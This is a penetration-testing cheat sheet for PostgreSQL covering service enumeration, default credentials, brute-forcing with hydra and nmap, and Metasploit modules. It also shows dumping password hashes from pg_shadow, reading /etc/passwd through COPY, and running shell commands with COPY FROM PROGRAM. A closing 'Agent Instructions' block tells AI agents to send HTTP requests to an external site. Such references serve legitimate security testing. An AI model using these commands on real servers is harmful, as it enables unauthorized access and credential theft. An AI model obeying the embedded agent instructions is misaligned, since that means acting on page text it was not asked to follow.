# 5432 - PostgresSQL
PostgreSQL is an open source database which can be found mostly in Linux operating systems. However it has great compatibility with multiple operating systems and it can run in Windows and MacOS platforms as well. If the database is not properly configured and credentials have been obtained then it is possible to perform various activities like read and write system files and execution of arbitrary code.
## Enumeration
### Nmap
**Version disclosure**
`Use nmap -sV -p 5432 10.0.0.1`
**Bruteforce credentials:**
`nmap -p 5432 --script pgsql-brute`
### Metasploit
**Version disclosure**
`auxiliary/scanner/postgres/postgres_version`
**Bruteforce login:**
`auxiliary/scanner/postgres/postgres_login`
**Dump scheme:**
`auxiliary/scanner/postgres/postgres_schemadump`
**Database enumeration:**
`auxiliary/admin/postgres/postgres_sql`
**Hashdump:**
`auxiliary/scanner/postgres/postgres_hashdump`
**Read files:**
`auxiliary/admin/postgres/postgres_readfile`
**Reverse shell**
`exploit/linux/postgres/postgres_payload`
## Login
Login using psql:
`psql -h 192.168.100.11 -U postgres`
## Common/default credentials
| Username | Password |
| -------- | -------- |
| postgres | postgres |
| postgres | password |
| postgres | admin |
| admin | admin |
| admin | password |
### Bruteforce login credentials:
```
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.120 postgres
```
## Commands
| Description | Command |
| ----------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| List databases | \l |
| List databases users | \du |
| List existing tables | \dt |
| Connect to a specific database | \c database\_name; |
| Get detailed information on a table | \d+ table\_name |
| Get table content | select \* from table\_name; |
| Retrieving database passwords | SELECT \* FROM users;
OR
select usename, passwd from pg\_shadow
|
| Dumping databases content | SELECT usename, passwd FROM pg\_shadow;
OR
pg\_dump --host=192.168.100.11 --username=postgres --password --dbname=template1 --table='users' -f output\_pgdump
|
| Create a new database | CREATE DATABASE \[IF NOT EXISTS] db\_name; |
| exit the database | \q |
## Command execution
PostgreSQL databases can interact with the underlying operating by allowing the database administrator to execute various database commands and retrieve output from the system.
Run:
`postgres=# select pg_ls_dir('./');`
By executing the following command it is possible to read server side postgres files.
`postgres=# select pg_read_file('PG_VERSION', 0, 200);`
It is also possible to create a database table in order to store and view contents of a file that exist in the host.
```
postgres-# CREATE TABLE temp(t TEXT);
postgres-# COPY temp FROM '/etc/passwd';
postgres-# SELECT * FROM temp;
```
OR use the metasploit module
`Auxiliary/admin/postgres/postgres_readfile`
### Execute command
```
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'sudo -l';
SELECT * FROM cmd_exec;
```
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://infra.newerasec.com/infrastructure-testing/enumeration/services-ports/5432-postgressql.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.